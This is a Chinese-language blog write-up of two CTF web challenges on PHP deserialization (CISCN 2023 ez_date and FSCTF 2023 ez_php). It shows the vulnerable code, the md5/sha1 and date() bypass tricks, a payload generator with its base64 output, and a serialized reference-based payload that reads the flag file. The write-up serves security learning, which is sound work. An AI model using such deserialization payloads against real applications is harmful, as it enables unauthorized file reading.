(反序列化)小记录

已于 2023-12-09 14:39:53 修改
阅读量756 收藏 10
点赞数 12
分类专栏: web反序列化 文章标签: 网络 学习 web php
于 2023-12-09 13:19:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73668856/article/details/134893842
版权

 

目录

 [CISCN 2023 华北]ez_date

绕过MD5和sha1强相关绕过

date()绕过

payload

[FSCTF 2023]ez_php

 [CISCN 2023 华北]ez_date

<?php
error_reporting(0);
highlight_file(__FILE__);
class date{
    public $a;
    public $b;
    public $file;
    public function __wakeup()
    {
        if(is_array($this->a)||is_array($this->b)){
            die('no array');
        }
        if( ($this->a !== $this->b) && (md5($this->a) === md5($this->b)) && (sha1($this->a)=== sha1($this->b)) ){
            $content=date($this->file);
            $uuid=uniqid().'.txt';
            file_put_contents($uuid,$content);
            $data=preg_replace('/((\s)*(\n)+(\s)*)/i','',file_get_contents($uuid));
            echo file_get_contents($data);
        }
        else{
            die();
        }
    }
}

unserialize(base64_decode($_GET['code']));

不能用数组绕过,且a不能等于b,a、b的md5和sha1的值要强相关相等

date函数会对特定的字母转化为特定的时间表达格式

把file的内容进行date函数处理当作数据,uniqid的数据作文件名

        uniqid()是PHP中的一个函数,用于生成唯一的字符串。它可以带一个可选的前缀参数和一个用于指定是否使用更多的熵的布尔类型的参数。

        当没有任何参数传入uniqid()函数时,它会生成一个基于当前时间微秒数的唯一字符串。如果在同一微秒内调用uniqid()函数多次,则会生成不同的字符串,因为它还会添加一个随机数,以防止生成重复的字符串。

        如果指定了前缀参数,则生成的字符串将以该前缀开头。例如,uniqid('prefix_')可能会生成类似于prefix_5f9a1d1bcb6c2的字符串。前缀参数通常用于生成特定的唯一标识符,例如用于数据库表的主键。

        第二个参数用于指定是否使用更多的熵来增加生成唯一字符串的难度。如果设置为true,则会添加额外的信息(如当前进程ID、线程ID或时间戳)来生成更长的唯一字符串。

之后对这个文件进行正则表达式的替换

正则表达的解释

绕过MD5和sha1强相关绕过

($this->a !== $this->b) && (md5($this->a) === md5($this->b)) && (sha1($this->a)=== sha1($this->b))

1.用原生类error绕过

网上说可以,但是一些大佬说不过不知为何php8下可用, 放到5和7不可用, 题目貌似也是7, 这条路走不通

2.数字型和字符型的绕过

由于前面是!==,所以第一个判断数字型和字符型是1

date()绕过

对里面的字符加反斜杠防止转义

如上图

payload

<?php
class date{
    public $a=1;
    public $b='1';
    public $file='/f\l\a\g';
}
$c=new date;
echo base64_encode(serialize($c));

结果
Tzo0OiJkYXRlIjozOntzOjE6ImEiO2k6MTtzOjE6ImIiO3M6MToiMSI7czo0OiJmaWxlIjtzOjg6Ii9mXGxcYVxnIjt9

[FSCTF 2023]ez_php1

进入题目

第一个数组绕过

第二个随便FL_AG=1,得到提示!!!Congratulation!!L0vey0U.php

解释一下正则表达式

preg_match('/^.*(flag).*$/', $ja)

进到L0vey0U.php

L0vey0U.php?str=s:10:"YES I love";

得到P0int.php

进到P0int.php

 <?php
highlight_file(__FILE__);
error_reporting(0);
class Clazz
{
    public $a;
    public $b;

    public function __wakeup()
    {
        $this->a = file_get_contents("php://filter/read=convert.base64-encode/resource=g0t_f1ag.php");
    }
    public function __destruct()
    {
        echo $this->b;
    }
}
@unserialize($_POST['data']);

?>

这里应该输出$a的值,而不是$b的值

用引用的方法

O:5:"Clazz":2:{s:1:"a";N;s:1:"b";R:2;}

r为2代表是第二个反序列化元素被引用

_MOB_
关注
  • 12
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
2023全国大学生信息安全竞赛(ciscn)初赛题解
返璞归真的博客
05-28 1万+
2023全国大学生信息安全竞赛(ciscn)部分题解
weblogic反序列化.zip
07-08
1. 禁用不受信任的反序列化:修改WebLogic配置,限制哪些类可以被反序列化,或者禁用不必要的反序列化功能。 2. 部署入侵检测系统:使用入侵检测系统(IDS)或入侵防御系统(IPS)监控网络流量,识别并阻止恶意的...
ciscn2023华北赛区
……
06-29 898
利用点在这里的os.system函数。这里的savepath是我们可控的,通过修改文件名就可以控制savepath的值,所以在os.system函数中拼接系统命令,本地运行进行调试。看到在本地是执行了命令的,但是页面上没有回显,考虑弹shell,因为不允许一些符号使用,所以用base64编码一下。利用不同类型a=1和b='1’绕过强等判断。这里通过’'符号来绕过,/f\l\a\g。这里禁止了通过数组绕过md5的方法。反序列化触发wakeup函数。payload拿到原题。
[CISCN 2023 华北]pysym
rev1ve的博客
11-17 484
分析一下,首先检查上传文件是否为空以及文件大小,对文件名进行路径拼接,然后给出上传成功后随机的文件路径,try命令执行tar解压文件,这里存在RCE漏洞,我们可以利用。除此之外,发现当savepath包含一些特殊字符时会引发file.save(savepath)报错,用base64避免。因为os.system是无回显的,我们尝试反弹shell。随便上传一个文件,bp抓包修改文件名。
NSSCTF web刷题记录3
rev1ve的博客
10-28 618
使用 uniqid() 生成一个唯一的标识符,并将其与 .txt 扩展名拼接为文件名,赋值给变量 $uuid;这里关键是要去得到cookie_secret的值,借助百度,Tornado框架的附属文件handler.settings中存在cookie_secret,修改下payload。我们要把flag复制到app.py,但是我们不知道当前目录是什么,所以多尝试看看需要几个。分别赋值即可绕过,那么我们再来看看date函数,我们本地测试下。,然后结合存在app.py,我们用cp命令把。
2023 CTF国赛初赛(CISCN) re- ez_byte
qq_54894802的博客
05-30 1458
我们跳到数据区,发现这个100%下面的,yes并没有在string窗口出现,我们按下x查询交叉引用,在执行yes之前,有个jmp指令,也就是说,按照程序执行是永远不好去到yes的地方的,也就是说,一定有什么操作,然后再跳到yes中去。在前面,我们分析了,对r12的操作,并没有直接出现在代码上,操作代码被隐藏了。为此,我们可以大致猜测就是运行程序,触发一个异常,然后通过此条转到想要操作的地方,进行操作,通过题目描述,应该就是嵌入了一堆字节码。我们查看判断跳入,yes的汇编,我们可以发现,
2022年强网杯rcefile wp
weixin_52829570的博客
08-01 1149
查看源码中config.inc.php,发现对cookie做了反序列化,并存在spl_autoload_register()函数。所以上传一个phar文件,并把Content-Type改成image/png。常见的大小写绕过,空格绕过,php4这种都可以绕过成功上传,但都不解析。cookie的userfile就是上传文件加密过的文件名来构造序列化。知道了flag的位置所以我们重新上传一个catflag的inc文件。带着构造的cookie进行访问可以看到代码被执行了。O32"文件名"0{}...
python序列化反序列化和异常处理笔记.doc
10-01
Python的序列化与反序列化是将数据结构或对象转换为可存储或传输的格式,然后再次转换回原数据的过程。这一过程对于保存程序状态、跨进程通信、数据持久化等场景非常有用。Python提供了多种序列化库,如pickle、json...
delphi序列化与反序列化
09-15
在IT行业中,序列化和反序列化是两个关键的概念,特别是在对象持久化、数据传输以及存储方面。在Delphi编程环境中,这两个概念同样至关重要。本文将深入探讨Delphi中的序列化与反序列化,以及如何处理组件和结构体的...
delphi_JSON序列化反序列化
10-12
本篇将深入探讨Delphi中的JSON序列化和反序列化技术。 一、JSON简介 JSON是一种独立于语言的数据表示格式,它基于ECMAScript的一个子集。一个有效的JSON对象通常包含键值对(key-value pairs)的集合,数组或其他...
详解Python中的序列化与反序列化的使用
09-21
Python中的序列化与反序列化是将对象的状态转化为可存储或传输的形式,以便于之后恢复对象的状态。在Python中,序列化通常用于保存程序状态、跨进程通信或在网络上传输数据。本文主要介绍的是Python标准库中的pickle...
ciscn2023-web 总结与思考
m0_64348326的博客
05-29 472
1.一开始本以为是一个简单的dump界面的命令注入,因为猜测源语句可能是先执行命令读取创建日志信息,然后file_get_contents写入/log/目录中。所以一开始就在读取的table_2_dump参数中进行fuzz,发现很多能用来执行命令的符号,例如反引号、$、|、;均被过滤了,不过尝试换行符成功了,于是尝试执行env成功在环境变量中找到了flag。2.赛后才知道这是非预期解,预期是。官方文档中说明了这是一个备份程序,在shell中可以执行备份操作,安装的mysqldump就是链接到该程序中的。
ciscn2023初赛 writeup
S4n_v1的博客
05-28 2916
第十六届全国大学生信息安全竞赛创新实践能力赛初赛wp。 pwn 2/6, misc 5/7, crypto 4/7, re 2/6, web 3/6
阿里云CTF2023 字节码跳动 wp (javascript字节码)
weixin_42100211的博客
04-23 1187
我的第一道javascript字节码逆向。
【Socket 编程】基于UDP协议建立多人聊天室
稻草人敲代码的博客
07-19 277
对于服务端来说,除了要接收消息之外,还要实现一个路由转发模块,该路由转发模块可以将相应发送给所有连接的客户端。而对于客户端来说,除了要发送消息给聊天室,还要能实时看到其它所有客户端的消息。下面来看看具体实现的代码,代码只给出核心模块,其余代码模块代码可以借鉴我之前的博客。具体来说,服务器类实现的功能只有收消息。
网络协议-SOTP 协议格式
ziyunLLL的博客
07-19 268
SOTP(Secure Overlay Transport Protocol)是一种安全的覆盖层传输协议,旨在提供增强的安全性和功能。2.密钥管理:密钥的管理和交换是协议安全的重要部分,通常使用公钥基础设施(PKI)或密钥交换协议(如 Diffie-Hellman)。1.安全性:确保加密算法和认证算法的安全性。常用的加密算法包括 AES,常用的认证算法包括 HMAC-SHA256。3.性能:加密和认证会增加计算开销,需要在安全性和性能之间找到平衡。SOTP 协议格式的一般结构。
docker build时的网络问题
最新发布
flynetcn的专栏
07-19 217
docker build网络问题
27_MobileNetV3网络详解
https://github.com/foxpup11?tab=repositories
07-17 803
https://www.bilibili.com/video/BV1GK4y1p7uE/?spm_id_from=333.999.0.0&vd_source=7dace3632125a1ef7fd32c285eb2fbac
RTI DDS大数据碎片
qq_33089547的博客
07-17 961
PublicationBuiltingTopicData或SubscriptionBuiltnTopicData样本较大的最常见原因是序列化的TypeCode或TypeObject,但您也可能发送了大量属性(通过7.5.19 PROPERTY QosPolicy(DDS扩展))或具有较大的ContentFilteredTopic筛选器表达式,以及其他大小可变的字段,这可能会导致样本大小较大。如果您尝试发送一个大小大于MTU的DDS样本,但尚未设置DDS级碎片,您将看到IP级碎片。
序列化和反序列化应用场景
07-27
序列化和反序列化是用于在不同系统或者不同语言之间传输对象或者保存对象状态的过程。序列化将对象转换为字节流的形式,以便于传输或者保存到文件中。而反序列化则是将字节流重新转换为对象的过程。 序列化和反序列化的应用场景有很多,以下是一些常见的应用场景: 1. 网络传输:当我们需要在网络上传输对象时,可以将对象进行序列化,然后通过网络传输字节流,接收方再进行反序列化恢复成对象。这在分布式系统、远程调用等场景中非常常见。 2. 持久化存储:将对象序列化后保存到文件或者数据库中,以便于下次读取和使用。这在缓存、日志记录、数据备份等场景中经常使用。 3. 分布式缓存:将对象序列化后存储到分布式缓存中,以提高系统性能和可扩展性。这在大规模分布式系统中非常常见。 4. 消息队列:将对象序列化后发送到消息队列中,以实现异步通信和解耦。这在微服务架构、事件驱动架构等场景中广泛应用。 5. 对象复制:通过序列化和反序列化可以实现对象的深拷贝,即创建一个与原对象完全相同的新对象。这在多线程环境下保证对象的线程安全性非常重要。 实现序列化和反序列化的方式有多种,其中最常见的是使用Java的Serializable接口。通过实现Serializable接口,可以告诉Java虚拟机该类是可序列化的,并且可以使用Java的序列化机制进行序列化和反序列化操作。此外,还可以使用其他序列化框架如JSON、XML等进行序列化和反序列化。 #### 引用[.reference_title] - *1* *2* [什么是序列化?反序列化? 场景使用? 怎么实现???](https://blog.csdn.net/qq_43705131/article/details/107064184)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [Java对象的序列化(Serialization)和反序列化详解](https://blog.csdn.net/yaomingyang/article/details/79321939)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_MOB_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值